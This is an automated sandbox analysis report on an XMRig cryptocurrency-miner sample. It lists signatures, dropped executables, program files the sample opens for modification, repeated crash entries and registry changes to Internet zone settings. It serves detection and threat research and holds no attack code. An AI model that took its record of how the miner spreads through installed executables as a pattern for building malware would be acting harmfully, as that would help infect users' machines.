Malware Analysis Report

2025-01-22 12:22

Sample ID 240518-xhgqnaaa9y
Target 5646516f9069627c54a3878c3af85286_JaffaCakes118
SHA256 ff4e9b01d2553acf16d757f2877f29710872de0c468d3eccded2a00decb7b8d9
Tags
miner xmrig aspackv2
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ff4e9b01d2553acf16d757f2877f29710872de0c468d3eccded2a00decb7b8d9

Threat Level: Known bad

The file 5646516f9069627c54a3878c3af85286_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

miner xmrig aspackv2

xmrig

Xmrig family

XMRig Miner payload

XMRig Miner payload

ASPack v2.12-2.42

Checks computer location settings

Executes dropped EXE

Deletes itself

Loads dropped DLL

Drops file in System32 directory

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Runs ping.exe

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-18 18:51

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-18 18:51

Reported

2024-05-18 18:53

Platform

win7-20240508-en

Max time kernel

146s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\k2[1].rar C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\TEMP\aEHvt.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\k1[1].rar C:\Windows\TEMP\aEHvt.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Mail\wabmig.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Windows Journal\PDIALOG.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\WORDICON.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\pack200.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Wordconv.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstat.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\unpack200.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\updater.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstack.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\kinit.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\tnameserv.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\java.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSOUC.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\serialver.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmc.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaw.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Windows Mail\wab.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\keytool.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\ONELEV.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\keytool.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateSetup.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSACCESS.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdate.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\wsgen.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\ImagingDevices.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Setup.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PPTICO.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\policytool.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Backgammon\bckgzm.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Windows Mail\wabmig.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OIS.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javah.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\Mahjong.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javac.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\servertool.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Windows Journal\PDIALOG.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\VPREVIEW.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Windows Mail\WinMail.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\misc.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\7-Zip\7zG.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\jabswitch.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Eula.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\NAMECONTROLSERVER.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\private_browsing.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\Install\{5629EE71-1934-428C-A492-DBD2787497EC}\chrome_installer.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ACCICONS.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jabswitch.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-ff-bb-18-f6-f2\WpadDecision = "0" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D25A5B7E-7C27-41B6-85A7-D7DFDF730D14} C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
